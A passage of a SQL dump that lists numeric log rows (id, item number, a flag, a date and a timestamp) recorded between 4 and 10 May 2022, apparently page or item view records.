10:21:48'),(50787,3735,1,'2022-05-04','2022-05-04 10:21:54'),(50788,4275,1,'2022-05-04','2022-05-04 10:21:59'),(50789,2804,1,'2022-05-04','2022-05-04 10:22:04'),(50790,3045,1,'2022-05-04','2022-05-04 10:22:09'),(50791,4657,1,'2022-05-04','2022-05-04 10:22:13'),(50792,4332,1,'2022-05-04','2022-05-04 10:22:18'),(50793,3124,1,'2022-05-04','2022-05-04 10:22:23'),(50794,4551,1,'2022-05-04','2022-05-04 10:22:28'),(50795,3063,1,'2022-05-04','2022-05-04 10:22:32'),(50796,3060,1,'2022-05-04','2022-05-04 10:22:37'),(50797,3752,1,'2022-05-04','2022-05-04 10:22:41'),(50798,3724,1,'2022-05-04','2022-05-04 10:22:45'),(50799,4566,1,'2022-05-04','2022-05-04 10:22:49'),(50800,4582,1,'2022-05-04','2022-05-04 10:22:54'),(50801,4520,1,'2022-05-04','2022-05-04 10:22:59'),(50802,3498,1,'2022-05-04','2022-05-04 10:23:04'),(50803,3090,1,'2022-05-04','2022-05-04 10:23:09'),(50804,4651,1,'2022-05-04','2022-05-04 10:23:13'),(50805,4660,1,'2022-05-04','2022-05-04 10:23:18'),(50806,3438,1,'2022-05-04','2022-05-04 10:23:23'),(50807,3316,1,'2022-05-04','2022-05-04 10:23:28'),(50808,4335,1,'2022-05-04','2022-05-04 10:23:32'),(50809,3038,1,'2022-05-04','2022-05-04 10:23:37'),(50810,2813,1,'2022-05-04','2022-05-04 10:23:41'),(50811,3313,1,'2022-05-04','2022-05-04 10:23:46'),(50812,3117,1,'2022-05-04','2022-05-04 10:23:50'),(50813,3749,1,'2022-05-04','2022-05-04 10:23:55'),(50814,4454,1,'2022-05-04','2022-05-04 10:24:00'),(50815,2956,1,'2022-05-04','2022-05-04 10:24:04'),(50816,3307,1,'2022-05-04','2022-05-04 10:24:09'),(50817,3534,1,'2022-05-04','2022-05-04 10:24:14'),(50818,3727,1,'2022-05-04','2022-05-04 10:24:21'),(50819,3069,1,'2022-05-04','2022-05-04 10:24:26'),(50820,3777,1,'2022-05-04','2022-05-04 10:24:31'),(50821,3297,1,'2022-05-04','2022-05-04 10:24:35'),(50822,4338,1,'2022-05-04','2022-05-04 10:24:39'),(50823,4492,1,'2022-05-04','2022-05-04 10:24:43'),(50824,3034,1,'2022-05-04','2022-05-04 10:24:43'),(50825,4654,1,'2022-05-04','2022-05-04 10:24:48'),(50826,4400,1,'2022-05-04','2022-05-04 10:24:53'),(50827,4514,1,'2022-05-04','2022-05-04 10:24:58'),(50828,3489,1,'2022-05-04','2022-05-04 10:25:02'),(50829,3746,1,'2022-05-04','2022-05-04 10:25:07'),(50830,3066,1,'2022-05-04','2022-05-04 10:25:12'),(50831,4329,1,'2022-05-04','2022-05-04 10:25:16'),(50832,2911,1,'2022-05-04','2022-05-04 10:25:21'),(50833,3714,1,'2022-05-04','2022-05-04 10:25:26'),(50834,4648,1,'2022-05-04','2022-05-04 10:25:31'),(50835,91,1,'2022-05-04','2022-05-04 10:28:16'),(50836,4416,1,'2022-05-04','2022-05-04 10:37:02'),(50837,2751,1,'2022-05-04','2022-05-04 11:04:00'),(50838,1602,1,'2022-05-04','2022-05-04 11:04:08'),(50839,2751,1,'2022-05-04','2022-05-04 11:04:14'),(50840,1604,1,'2022-05-04','2022-05-04 11:05:55'),(50841,3691,1,'2022-05-04','2022-05-04 11:09:12'),(50842,1602,1,'2022-05-04','2022-05-04 11:22:52'),(50843,1602,1,'2022-05-04','2022-05-04 12:16:59'),(50844,3307,1,'2022-05-04','2022-05-04 12:43:35'),(50845,1596,1,'2022-05-04','2022-05-04 12:45:54'),(50846,3102,1,'2022-05-04','2022-05-04 13:08:35'),(50847,4341,1,'2022-05-04','2022-05-04 13:42:29'),(50848,1737,1,'2022-05-04','2022-05-04 13:57:04'),(50849,1600,1,'2022-05-04','2022-05-04 13:57:16'),(50850,1737,1,'2022-05-04','2022-05-04 13:57:26'),(50851,1737,1,'2022-05-04','2022-05-04 13:58:01'),(50852,2658,1,'2022-05-04','2022-05-04 14:18:42'),(50853,4622,1,'2022-05-04','2022-05-04 14:26:51'),(50854,1588,1,'2022-05-04','2022-05-04 14:35:08'),(50855,1602,1,'2022-05-04','2022-05-04 14:56:24'),(50856,1586,1,'2022-05-04','2022-05-04 15:00:39'),(50857,4341,1,'2022-05-04','2022-05-04 15:11:31'),(50858,1594,1,'2022-05-04','2022-05-04 15:16:56'),(50859,3069,1,'2022-05-04','2022-05-04 15:27:19'),(50860,3226,1,'2022-05-04','2022-05-04 15:37:27'),(50861,4657,1,'2022-05-04','2022-05-04 15:47:44'),(50862,1606,1,'2022-05-04','2022-05-04 15:58:14'),(50863,3226,1,'2022-05-04','2022-05-04 16:18:31'),(50864,1544,1,'2022-05-04','2022-05-04 16:25:03'),(50865,1544,1,'2022-05-04','2022-05-04 16:26:23'),(50866,1612,1,'2022-05-04','2022-05-04 16:58:02'),(50867,3764,1,'2022-05-04','2022-05-04 16:59:35'),(50868,1604,1,'2022-05-04','2022-05-04 19:11:02'),(50869,76,1,'2022-05-04','2022-05-04 19:23:31'),(50870,1604,1,'2022-05-04','2022-05-04 19:32:53'),(50871,1604,1,'2022-05-04','2022-05-04 19:36:46'),(50872,3781,1,'2022-05-04','2022-05-04 19:38:50'),(50873,1741,1,'2022-05-04','2022-05-04 19:51:16'),(50874,3486,1,'2022-05-04','2022-05-04 19:53:20'),(50875,1604,1,'2022-05-04','2022-05-04 20:26:25'),(50876,1604,1,'2022-05-04','2022-05-04 20:27:50'),(50877,3764,1,'2022-05-04','2022-05-04 20:38:21'),(50878,68,1,'2022-05-04','2022-05-04 21:18:34'),(50879,1544,1,'2022-05-04','2022-05-04 23:32:30'),(50880,3069,1,'2022-05-05','2022-05-05 00:00:35'),(50881,4412,1,'2022-05-05','2022-05-05 00:12:46'),(50882,1766,1,'2022-05-05','2022-05-05 00:48:33'),(50883,2410,1,'2022-05-05','2022-05-05 00:59:36'),(50884,3226,1,'2022-05-05','2022-05-05 01:29:35'),(50885,478,1,'2022-05-05','2022-05-05 02:13:41'),(50886,1715,1,'2022-05-05','2022-05-05 02:57:55'),(50887,1592,1,'2022-05-05','2022-05-05 02:58:37'),(50888,3175,1,'2022-05-05','2022-05-05 03:43:37'),(50889,467,1,'2022-05-05','2022-05-05 03:45:00'),(50890,3764,1,'2022-05-05','2022-05-05 04:50:25'),(50891,1612,1,'2022-05-05','2022-05-05 05:01:19'),(50892,476,1,'2022-05-05','2022-05-05 05:08:11'),(50893,4494,1,'2022-05-05','2022-05-05 05:12:28'),(50894,467,1,'2022-05-05','2022-05-05 05:13:37'),(50895,3534,1,'2022-05-05','2022-05-05 05:18:07'),(50896,1614,1,'2022-05-05','2022-05-05 05:38:15'),(50897,3226,1,'2022-05-05','2022-05-05 05:51:51'),(50898,3226,1,'2022-05-05','2022-05-05 06:03:05'),(50899,1612,1,'2022-05-05','2022-05-05 06:14:22'),(50900,1592,1,'2022-05-05','2022-05-05 06:21:11'),(50901,1598,1,'2022-05-05','2022-05-05 06:25:36'),(50902,3534,1,'2022-05-05','2022-05-05 06:37:02'),(50903,2410,1,'2022-05-05','2022-05-05 06:48:05'),(50904,1600,1,'2022-05-05','2022-05-05 06:51:55'),(50905,482,1,'2022-05-05','2022-05-05 06:59:23'),(50906,476,1,'2022-05-05','2022-05-05 07:19:52'),(50907,3486,1,'2022-05-05','2022-05-05 07:21:52'),(50908,3781,1,'2022-05-05','2022-05-05 07:33:06'),(50909,482,1,'2022-05-05','2022-05-05 07:44:24'),(50910,3486,1,'2022-05-05','2022-05-05 07:55:38'),(50911,4566,1,'2022-05-05','2022-05-05 08:08:06'),(50912,1600,1,'2022-05-05','2022-05-05 08:30:17'),(50913,4648,1,'2022-05-05','2022-05-05 08:40:36'),(50914,1596,1,'2022-05-05','2022-05-05 08:52:01'),(50915,91,1,'2022-05-05','2022-05-05 08:52:16'),(50916,1596,1,'2022-05-05','2022-05-05 08:52:36'),(50917,1596,1,'2022-05-05','2022-05-05 08:52:48'),(50918,4323,1,'2022-05-05','2022-05-05 09:19:49'),(50919,1586,1,'2022-05-05','2022-05-05 09:35:44'),(50920,2148,1,'2022-05-05','2022-05-05 09:44:12'),(50921,2457,1,'2022-05-05','2022-05-05 10:10:06'),(50922,1582,1,'2022-05-05','2022-05-05 10:10:14'),(50923,1596,1,'2022-05-05','2022-05-05 10:14:34'),(50924,1586,1,'2022-05-05','2022-05-05 10:18:16'),(50925,1582,1,'2022-05-05','2022-05-05 10:21:46'),(50926,1722,1,'2022-05-05','2022-05-05 10:32:30'),(50927,2904,1,'2022-05-05','2022-05-05 10:36:18'),(50928,4457,1,'2022-05-05','2022-05-05 10:37:35'),(50929,1722,1,'2022-05-05','2022-05-05 10:38:43'),(50930,1722,1,'2022-05-05','2022-05-05 10:39:16'),(50931,1596,1,'2022-05-05','2022-05-05 10:41:37'),(50932,1602,1,'2022-05-05','2022-05-05 12:15:41'),(50933,68,1,'2022-05-05','2022-05-05 12:35:01'),(50934,472,1,'2022-05-05','2022-05-05 12:43:39'),(50935,2297,1,'2022-05-05','2022-05-05 12:50:10'),(50936,3226,1,'2022-05-05','2022-05-05 13:03:19'),(50937,2911,1,'2022-05-05','2022-05-05 13:03:20'),(50938,3181,1,'2022-05-05','2022-05-05 13:48:23'),(50939,4622,1,'2022-05-05','2022-05-05 13:48:36'),(50940,3069,1,'2022-05-05','2022-05-05 14:10:46'),(50941,1588,1,'2022-05-05','2022-05-05 14:39:21'),(50942,1734,1,'2022-05-05','2022-05-05 14:55:46'),(50943,4520,1,'2022-05-05','2022-05-05 14:58:35'),(50944,2410,1,'2022-05-05','2022-05-05 15:18:14'),(50945,1586,1,'2022-05-05','2022-05-05 15:40:28'),(50946,1586,1,'2022-05-05','2022-05-05 15:45:34'),(50947,1612,1,'2022-05-05','2022-05-05 15:51:16'),(50948,1612,1,'2022-05-05','2022-05-05 15:53:14'),(50949,1592,1,'2022-05-05','2022-05-05 15:55:16'),(50950,80,1,'2022-05-05','2022-05-05 15:55:34'),(50951,1612,1,'2022-05-05','2022-05-05 15:58:37'),(50952,80,1,'2022-05-05','2022-05-05 15:59:17'),(50953,1612,1,'2022-05-05','2022-05-05 16:04:51'),(50954,1612,1,'2022-05-05','2022-05-05 16:05:04'),(50955,1596,1,'2022-05-05','2022-05-05 16:40:45'),(50956,3316,1,'2022-05-05','2022-05-05 16:48:15'),(50957,91,1,'2022-05-05','2022-05-05 16:48:20'),(50958,1596,1,'2022-05-05','2022-05-05 17:20:17'),(50959,570,1,'2022-05-05','2022-05-05 17:26:13'),(50960,3781,1,'2022-05-05','2022-05-05 17:33:14'),(50961,4457,1,'2022-05-05','2022-05-05 17:40:17'),(50962,1588,1,'2022-05-05','2022-05-05 17:54:07'),(50963,3004,1,'2022-05-05','2022-05-05 18:10:34'),(50964,4612,1,'2022-05-05','2022-05-05 18:22:49'),(50965,570,1,'2022-05-05','2022-05-05 19:40:54'),(50966,1596,1,'2022-05-05','2022-05-05 19:44:31'),(50967,91,1,'2022-05-05','2022-05-05 19:44:50'),(50968,1596,1,'2022-05-05','2022-05-05 19:45:37'),(50969,1596,1,'2022-05-05','2022-05-05 20:01:42'),(50970,1596,1,'2022-05-05','2022-05-05 20:01:53'),(50971,1596,1,'2022-05-05','2022-05-05 21:53:13'),(50972,1596,1,'2022-05-05','2022-05-05 23:03:42'),(50973,467,1,'2022-05-06','2022-05-06 00:30:38'),(50974,1596,1,'2022-05-06','2022-05-06 00:45:18'),(50975,1596,1,'2022-05-06','2022-05-06 00:50:58'),(50976,1598,1,'2022-05-06','2022-05-06 02:08:34'),(50977,1770,1,'2022-05-06','2022-05-06 02:59:06'),(50978,80,1,'2022-05-06','2022-05-06 04:22:06'),(50979,3023,1,'2022-05-06','2022-05-06 04:26:35'),(50980,80,1,'2022-05-06','2022-05-06 04:32:38'),(50981,2410,1,'2022-05-06','2022-05-06 05:24:33'),(50982,4663,1,'2022-05-06','2022-05-06 05:25:49'),(50983,2410,1,'2022-05-06','2022-05-06 05:26:23'),(50984,3781,1,'2022-05-06','2022-05-06 05:55:31'),(50985,1596,1,'2022-05-06','2022-05-06 06:04:53'),(50986,335,1,'2022-05-06','2022-05-06 06:39:46'),(50987,1612,1,'2022-05-06','2022-05-06 06:51:51'),(50988,68,1,'2022-05-06','2022-05-06 06:53:12'),(50989,1608,1,'2022-05-06','2022-05-06 07:09:31'),(50990,1544,1,'2022-05-06','2022-05-06 07:20:09'),(50991,1596,1,'2022-05-06','2022-05-06 07:22:44'),(50992,1612,1,'2022-05-06','2022-05-06 07:24:57'),(50993,2769,1,'2022-05-06','2022-05-06 07:25:32'),(50994,1612,1,'2022-05-06','2022-05-06 07:34:32'),(50995,80,1,'2022-05-06','2022-05-06 08:31:59'),(50996,1582,1,'2022-05-06','2022-05-06 08:34:40'),(50997,80,1,'2022-05-06','2022-05-06 08:34:53'),(50998,1602,1,'2022-05-06','2022-05-06 09:13:24'),(50999,4457,1,'2022-05-06','2022-05-06 09:31:31'),(51000,1608,1,'2022-05-06','2022-05-06 10:09:21'),(51001,1596,1,'2022-05-06','2022-05-06 10:41:46'),(51002,1596,1,'2022-05-06','2022-05-06 10:47:26'),(51003,4436,1,'2022-05-06','2022-05-06 10:50:04'),(51004,1747,1,'2022-05-06','2022-05-06 10:53:29'),(51005,469,1,'2022-05-06','2022-05-06 11:14:29'),(51006,87,1,'2022-05-06','2022-05-06 12:21:15'),(51007,3023,1,'2022-05-06','2022-05-06 12:25:32'),(51008,68,1,'2022-05-06','2022-05-06 12:32:00'),(51009,89,1,'2022-05-06','2022-05-06 12:32:26'),(51010,1588,1,'2022-05-06','2022-05-06 12:32:40'),(51011,89,1,'2022-05-06','2022-05-06 12:33:15'),(51012,91,1,'2022-05-06','2022-05-06 12:33:39'),(51013,1724,1,'2022-05-06','2022-05-06 12:35:08'),(51014,1724,1,'2022-05-06','2022-05-06 12:40:21'),(51015,1724,1,'2022-05-06','2022-05-06 12:40:30'),(51016,91,1,'2022-05-06','2022-05-06 12:40:48'),(51017,89,1,'2022-05-06','2022-05-06 12:41:13'),(51018,1588,1,'2022-05-06','2022-05-06 12:41:24'),(51019,91,1,'2022-05-06','2022-05-06 12:43:34'),(51020,87,1,'2022-05-06','2022-05-06 12:44:16'),(51021,1770,1,'2022-05-06','2022-05-06 12:55:34'),(51022,68,1,'2022-05-06','2022-05-06 13:05:59'),(51023,91,1,'2022-05-06','2022-05-06 13:06:13'),(51024,1722,1,'2022-05-06','2022-05-06 13:18:04'),(51025,1588,1,'2022-05-06','2022-05-06 13:55:41'),(51026,4566,1,'2022-05-06','2022-05-06 14:03:02'),(51027,469,1,'2022-05-06','2022-05-06 14:25:31'),(51028,2297,1,'2022-05-06','2022-05-06 14:53:55'),(51029,2769,1,'2022-05-06','2022-05-06 15:10:32'),(51030,4542,1,'2022-05-06','2022-05-06 15:20:12'),(51031,4660,1,'2022-05-06','2022-05-06 15:33:06'),(51032,3045,1,'2022-05-06','2022-05-06 16:29:42'),(51033,1608,1,'2022-05-06','2022-05-06 17:50:03'),(51034,1600,1,'2022-05-06','2022-05-06 18:00:54'),(51035,4428,1,'2022-05-06','2022-05-06 19:20:03'),(51036,80,1,'2022-05-06','2022-05-06 20:04:19'),(51037,3698,1,'2022-05-06','2022-05-06 20:05:04'),(51038,3664,1,'2022-05-06','2022-05-06 20:47:03'),(51039,3041,1,'2022-05-06','2022-05-06 20:50:03'),(51040,468,1,'2022-05-06','2022-05-06 22:20:07'),(51041,4654,1,'2022-05-06','2022-05-06 22:47:14'),(51042,3752,1,'2022-05-06','2022-05-06 23:11:37'),(51043,4524,1,'2022-05-06','2022-05-06 23:24:26'),(51044,4660,1,'2022-05-07','2022-05-07 00:07:47'),(51045,1600,1,'2022-05-07','2022-05-07 00:17:24'),(51046,4660,1,'2022-05-07','2022-05-07 00:27:41'),(51047,3534,1,'2022-05-07','2022-05-07 00:37:18'),(51048,1598,1,'2022-05-07','2022-05-07 00:47:48'),(51049,4654,1,'2022-05-07','2022-05-07 00:59:07'),(51050,3746,1,'2022-05-07','2022-05-07 01:31:53'),(51051,3083,1,'2022-05-07','2022-05-07 01:37:17'),(51052,470,1,'2022-05-07','2022-05-07 01:37:52'),(51053,4566,1,'2022-05-07','2022-05-07 01:47:41'),(51054,1608,1,'2022-05-07','2022-05-07 03:44:40'),(51055,1582,1,'2022-05-07','2022-05-07 04:02:54'),(51056,3045,1,'2022-05-07','2022-05-07 04:25:25'),(51057,471,1,'2022-05-07','2022-05-07 04:47:57'),(51058,471,1,'2022-05-07','2022-05-07 05:10:24'),(51059,3240,1,'2022-05-07','2022-05-07 05:14:27'),(51060,4657,1,'2022-05-07','2022-05-07 05:33:24'),(51061,3041,1,'2022-05-07','2022-05-07 06:44:33'),(51062,469,1,'2022-05-07','2022-05-07 06:53:26'),(51063,3030,1,'2022-05-07','2022-05-07 07:37:27'),(51064,3752,1,'2022-05-07','2022-05-07 08:21:20'),(51065,3045,1,'2022-05-07','2022-05-07 08:37:49'),(51066,1606,1,'2022-05-07','2022-05-07 09:00:36'),(51067,3724,1,'2022-05-07','2022-05-07 09:33:13'),(51068,2410,1,'2022-05-07','2022-05-07 09:44:32'),(51069,1596,1,'2022-05-07','2022-05-07 09:49:29'),(51070,1600,1,'2022-05-07','2022-05-07 10:02:50'),(51071,482,1,'2022-05-07','2022-05-07 10:27:33'),(51072,4524,1,'2022-05-07','2022-05-07 10:38:16'),(51073,4660,1,'2022-05-07','2022-05-07 11:00:53'),(51074,4660,1,'2022-05-07','2022-05-07 11:14:18'),(51075,1877,1,'2022-05-07','2022-05-07 11:32:26'),(51076,1602,1,'2022-05-07','2022-05-07 11:36:54'),(51077,1582,1,'2022-05-07','2022-05-07 11:50:24'),(51078,4514,1,'2022-05-07','2022-05-07 12:08:18'),(51079,80,1,'2022-05-07','2022-05-07 12:58:16'),(51080,68,1,'2022-05-07','2022-05-07 12:58:22'),(51081,84,1,'2022-05-07','2022-05-07 12:58:35'),(51082,87,1,'2022-05-07','2022-05-07 12:58:45'),(51083,89,1,'2022-05-07','2022-05-07 12:58:55'),(51084,91,1,'2022-05-07','2022-05-07 12:58:58'),(51085,76,1,'2022-05-07','2022-05-07 12:59:02'),(51086,72,1,'2022-05-07','2022-05-07 12:59:14'),(51087,335,1,'2022-05-07','2022-05-07 12:59:25'),(51088,108,1,'2022-05-07','2022-05-07 12:59:35'),(51089,2503,1,'2022-05-07','2022-05-07 12:59:45'),(51090,1870,1,'2022-05-07','2022-05-07 12:59:55'),(51091,1877,1,'2022-05-07','2022-05-07 13:00:05'),(51092,1872,1,'2022-05-07','2022-05-07 13:00:15'),(51093,487,1,'2022-05-07','2022-05-07 13:00:25'),(51094,474,1,'2022-05-07','2022-05-07 13:00:35'),(51095,471,1,'2022-05-07','2022-05-07 13:02:28'),(51096,482,1,'2022-05-07','2022-05-07 13:08:28'),(51097,3107,1,'2022-05-07','2022-05-07 13:19:29'),(51098,1872,1,'2022-05-07','2022-05-07 13:38:18'),(51099,3664,1,'2022-05-07','2022-05-07 13:55:29'),(51100,1608,1,'2022-05-07','2022-05-07 15:57:17'),(51101,1726,1,'2022-05-07','2022-05-07 16:56:56'),(51102,3698,1,'2022-05-07','2022-05-07 17:23:12'),(51103,1592,1,'2022-05-07','2022-05-07 17:33:27'),(51104,3041,1,'2022-05-07','2022-05-07 18:08:42'),(51105,1608,1,'2022-05-07','2022-05-07 18:53:18'),(51106,2410,1,'2022-05-07','2022-05-07 19:12:50'),(51107,3752,1,'2022-05-07','2022-05-07 19:53:19'),(51108,3038,1,'2022-05-07','2022-05-07 20:09:16'),(51109,1586,1,'2022-05-07','2022-05-07 20:10:08'),(51110,1586,1,'2022-05-07','2022-05-07 20:10:12'),(51111,1586,1,'2022-05-07','2022-05-07 20:10:17'),(51112,91,1,'2022-05-07','2022-05-07 21:08:42'),(51113,4424,1,'2022-05-07','2022-05-07 21:09:03'),(51114,4436,1,'2022-05-07','2022-05-07 21:20:07'),(51115,1596,1,'2022-05-07','2022-05-07 22:30:16'),(51116,2704,1,'2022-05-07','2022-05-07 22:36:39'),(51117,1586,1,'2022-05-07','2022-05-07 23:01:40'),(51118,4660,1,'2022-05-07','2022-05-07 23:03:30'),(51119,1588,1,'2022-05-07','2022-05-07 23:14:24'),(51120,4391,1,'2022-05-07','2022-05-07 23:48:35'),(51121,4391,1,'2022-05-07','2022-05-07 23:49:04'),(51122,2410,1,'2022-05-08','2022-05-08 00:43:36'),(51123,1602,1,'2022-05-08','2022-05-08 01:17:53'),(51124,2410,1,'2022-05-08','2022-05-08 03:17:01'),(51125,1592,1,'2022-05-08','2022-05-08 03:44:37'),(51126,4657,1,'2022-05-08','2022-05-08 04:02:54'),(51127,2813,1,'2022-05-08','2022-05-08 04:03:02'),(51128,1608,1,'2022-05-08','2022-05-08 04:03:45'),(51129,3698,1,'2022-05-08','2022-05-08 04:47:52'),(51130,3038,1,'2022-05-08','2022-05-08 05:14:13'),(51131,3006,1,'2022-05-08','2022-05-08 05:32:54'),(51132,3240,1,'2022-05-08','2022-05-08 05:33:12'),(51133,4412,1,'2022-05-08','2022-05-08 05:55:24'),(51134,3045,1,'2022-05-08','2022-05-08 06:37:46'),(51135,4622,1,'2022-05-08','2022-05-08 08:02:44'),(51136,3694,1,'2022-05-08','2022-05-08 09:23:20'),(51137,3240,1,'2022-05-08','2022-05-08 09:24:22'),(51138,4408,1,'2022-05-08','2022-05-08 09:33:20'),(51139,4408,1,'2022-05-08','2022-05-08 09:40:11'),(51140,1544,1,'2022-05-08','2022-05-08 09:47:51'),(51141,2911,1,'2022-05-08','2022-05-08 10:23:14'),(51142,4408,1,'2022-05-08','2022-05-08 10:33:42'),(51143,1588,1,'2022-05-08','2022-05-08 10:44:59'),(51144,68,1,'2022-05-08','2022-05-08 10:47:50'),(51145,4408,1,'2022-05-08','2022-05-08 11:09:56'),(51146,3771,1,'2022-05-08','2022-05-08 11:20:43'),(51147,4323,1,'2022-05-08','2022-05-08 11:50:20'),(51148,3430,1,'2022-05-08','2022-05-08 12:05:12'),(51149,3109,1,'2022-05-08','2022-05-08 12:15:25'),(51150,3673,1,'2022-05-08','2022-05-08 12:21:39'),(51151,2911,1,'2022-05-08','2022-05-08 12:28:03'),(51152,1711,1,'2022-05-08','2022-05-08 12:35:12'),(51153,2410,1,'2022-05-08','2022-05-08 13:05:13'),(51154,1596,1,'2022-05-08','2022-05-08 13:07:26'),(51155,2911,1,'2022-05-08','2022-05-08 13:21:57'),(51156,1602,1,'2022-05-08','2022-05-08 13:31:41'),(51157,4323,1,'2022-05-08','2022-05-08 13:34:03'),(51158,3710,1,'2022-05-08','2022-05-08 13:35:58'),(51159,1608,1,'2022-05-08','2022-05-08 13:48:57'),(51160,3038,1,'2022-05-08','2022-05-08 14:02:45'),(51161,1604,1,'2022-05-08','2022-05-08 14:13:52'),(51162,4412,1,'2022-05-08','2022-05-08 14:43:49'),(51163,3045,1,'2022-05-08','2022-05-08 14:58:27'),(51164,3060,1,'2022-05-08','2022-05-08 15:13:28'),(51165,4416,1,'2022-05-08','2022-05-08 15:18:48'),(51166,3771,1,'2022-05-08','2022-05-08 15:24:47'),(51167,4657,1,'2022-05-08','2022-05-08 15:40:18'),(51168,4428,1,'2022-05-08','2022-05-08 16:03:49'),(51169,2309,1,'2022-05-08','2022-05-08 16:38:34'),(51170,1608,1,'2022-05-08','2022-05-08 16:49:26'),(51171,4335,1,'2022-05-08','2022-05-08 17:08:32'),(51172,4524,1,'2022-05-08','2022-05-08 18:23:33'),(51173,1586,1,'2022-05-08','2022-05-08 18:47:19'),(51174,1586,1,'2022-05-08','2022-05-08 18:47:19'),(51175,1602,1,'2022-05-08','2022-05-08 19:08:33'),(51176,4660,1,'2022-05-08','2022-05-08 19:54:09'),(51177,1586,1,'2022-05-08','2022-05-08 20:15:38'),(51178,1594,1,'2022-05-08','2022-05-08 22:24:42'),(51179,2159,1,'2022-05-08','2022-05-08 23:42:55'),(51180,3107,1,'2022-05-09','2022-05-09 00:40:02'),(51181,1614,1,'2022-05-09','2022-05-09 01:57:54'),(51182,2178,1,'2022-05-09','2022-05-09 01:58:55'),(51183,3710,1,'2022-05-09','2022-05-09 02:13:58'),(51184,4566,1,'2022-05-09','2022-05-09 02:44:24'),(51185,4657,1,'2022-05-09','2022-05-09 03:13:54'),(51186,1872,1,'2022-05-09','2022-05-09 03:28:55'),(51187,1594,1,'2022-05-09','2022-05-09 03:43:53'),(51188,4412,1,'2022-05-09','2022-05-09 03:59:00'),(51189,2159,1,'2022-05-09','2022-05-09 04:12:56'),(51190,1614,1,'2022-05-09','2022-05-09 04:13:54'),(51191,1600,1,'2022-05-09','2022-05-09 04:59:43'),(51192,1602,1,'2022-05-09','2022-05-09 05:21:54'),(51193,3038,1,'2022-05-09','2022-05-09 06:07:12'),(51194,1594,1,'2022-05-09','2022-05-09 06:29:44'),(51195,1606,1,'2022-05-09','2022-05-09 08:05:21'),(51196,1606,1,'2022-05-09','2022-05-09 08:08:18'),(51197,1596,1,'2022-05-09','2022-05-09 08:43:49'),(51198,3706,1,'2022-05-09','2022-05-09 10:35:11'),(51199,4668,1,'2022-05-09','2022-05-09 11:27:30'),(51200,84,1,'2022-05-09','2022-05-09 12:04:10'),(51201,3691,1,'2022-05-09','2022-05-09 12:05:25'),(51202,4685,1,'2022-05-09','2022-05-09 12:24:25'),(51203,4674,1,'2022-05-09','2022-05-09 12:24:26'),(51204,4694,1,'2022-05-09','2022-05-09 12:24:36'),(51205,4681,1,'2022-05-09','2022-05-09 12:24:48'),(51206,4691,1,'2022-05-09','2022-05-09 12:25:01'),(51207,4677,1,'2022-05-09','2022-05-09 12:26:23'),(51208,4688,1,'2022-05-09','2022-05-09 12:27:16'),(51209,4457,1,'2022-05-09','2022-05-09 12:43:51'),(51210,1614,1,'2022-05-09','2022-05-09 13:02:23'),(51211,2159,1,'2022-05-09','2022-05-09 13:02:36'),(51212,1602,1,'2022-05-09','2022-05-09 13:10:57'),(51213,2804,1,'2022-05-09','2022-05-09 13:28:04'),(51214,4697,1,'2022-05-09','2022-05-09 13:33:23'),(51215,3104,1,'2022-05-09','2022-05-09 13:36:50'),(51216,84,1,'2022-05-09','2022-05-09 13:40:44'),(51217,3694,1,'2022-05-09','2022-05-09 13:41:48'),(51218,84,1,'2022-05-09','2022-05-09 13:44:13'),(51219,1544,1,'2022-05-09','2022-05-09 13:52:41'),(51220,4520,1,'2022-05-09','2022-05-09 13:57:42'),(51221,4323,1,'2022-05-09','2022-05-09 13:58:03'),(51222,4660,1,'2022-05-09','2022-05-09 14:10:53'),(51223,4412,1,'2022-05-09','2022-05-09 14:48:08'),(51224,89,1,'2022-05-09','2022-05-09 15:01:39'),(51225,1602,1,'2022-05-09','2022-05-09 15:03:40'),(51226,4685,1,'2022-05-09','2022-05-09 15:06:01'),(51227,482,1,'2022-05-09','2022-05-09 15:17:26'),(51228,4326,1,'2022-05-09','2022-05-09 15:53:56'),(51229,1612,1,'2022-05-09','2022-05-09 16:09:16'),(51230,1612,1,'2022-05-09','2022-05-09 16:11:13'),(51231,76,1,'2022-05-09','2022-05-09 16:11:37'),(51232,1612,1,'2022-05-09','2022-05-09 16:11:49'),(51233,1612,1,'2022-05-09','2022-05-09 16:12:57'),(51234,1612,1,'2022-05-09','2022-05-09 16:14:00'),(51235,4709,1,'2022-05-09','2022-05-09 16:30:33'),(51236,4700,1,'2022-05-09','2022-05-09 16:30:41'),(51237,4703,1,'2022-05-09','2022-05-09 16:30:48'),(51238,4712,1,'2022-05-09','2022-05-09 16:31:36'),(51239,4706,1,'2022-05-09','2022-05-09 16:31:41'),(51240,2809,1,'2022-05-09','2022-05-09 16:33:13'),(51241,1544,1,'2022-05-09','2022-05-09 17:10:34'),(51242,3263,1,'2022-05-09','2022-05-09 17:13:41'),(51243,1596,1,'2022-05-09','2022-05-09 17:24:48'),(51244,469,1,'2022-05-09','2022-05-09 17:42:48'),(51245,3664,1,'2022-05-09','2022-05-09 18:39:15'),(51246,84,1,'2022-05-09','2022-05-09 19:11:46'),(51247,1726,1,'2022-05-09','2022-05-09 19:24:15'),(51248,1586,1,'2022-05-09','2022-05-09 19:45:45'),(51249,80,1,'2022-05-09','2022-05-09 20:35:41'),(51250,1726,1,'2022-05-09','2022-05-09 20:54:15'),(51251,4663,1,'2022-05-09','2022-05-09 21:09:07'),(51252,1582,1,'2022-05-09','2022-05-09 21:24:11'),(51253,1582,1,'2022-05-09','2022-05-09 21:25:44'),(51254,1598,1,'2022-05-09','2022-05-09 21:30:16'),(51255,1726,1,'2022-05-09','2022-05-09 21:39:14'),(51256,3030,1,'2022-05-09','2022-05-09 21:41:27'),(51257,4709,1,'2022-05-09','2022-05-09 22:06:43'),(51258,1586,1,'2022-05-09','2022-05-09 22:28:48'),(51259,1610,1,'2022-05-09','2022-05-09 23:12:30'),(51260,1610,1,'2022-05-09','2022-05-09 23:12:33'),(51261,1586,1,'2022-05-09','2022-05-09 23:50:49'),(51262,1586,1,'2022-05-09','2022-05-09 23:50:50'),(51263,1586,1,'2022-05-09','2022-05-09 23:50:54'),(51264,3087,1,'2022-05-10','2022-05-10 00:02:29'),(51265,80,1,'2022-05-10','2022-05-10 00:03:00'),(51266,2297,1,'2022-05-10','2022-05-10 00:29:54'),(51267,1596,1,'2022-05-10','2022-05-10 00:29:58'),(51268,4404,1,'2022-05-10','2022-05-10 00:30:04'),(51269,72,1,'2022-05-10','2022-05-10 00:31:13'),(51270,1592,1,'2022-05-10','2022-05-10 00:31:44'),(51271,4668,1,'2022-05-10','2022-05-10 01:11:46'),(51272,3087,1,'2022-05-10','2022-05-10 